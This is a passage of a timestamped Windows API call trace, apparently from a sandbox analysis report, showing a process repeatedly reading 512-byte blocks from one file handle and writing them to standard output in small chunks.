lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.833] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.833] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] GetFileType (hFile=0x50) returned 0x1 [0194.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] GetFileType (hFile=0x50) returned 0x1 [0194.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.834] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.835] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] GetFileType (hFile=0x50) returned 0x1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.835] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.836] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.836] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.836] GetFileType (hFile=0x50) returned 0x1 [0194.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] GetFileType (hFile=0x50) returned 0x1 [0194.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.837] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] GetFileType (hFile=0x50) returned 0x1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.838] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.839] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.839] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.840] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.840] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.840] GetFileType (hFile=0x50) returned 0x1 [0194.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=4) returned 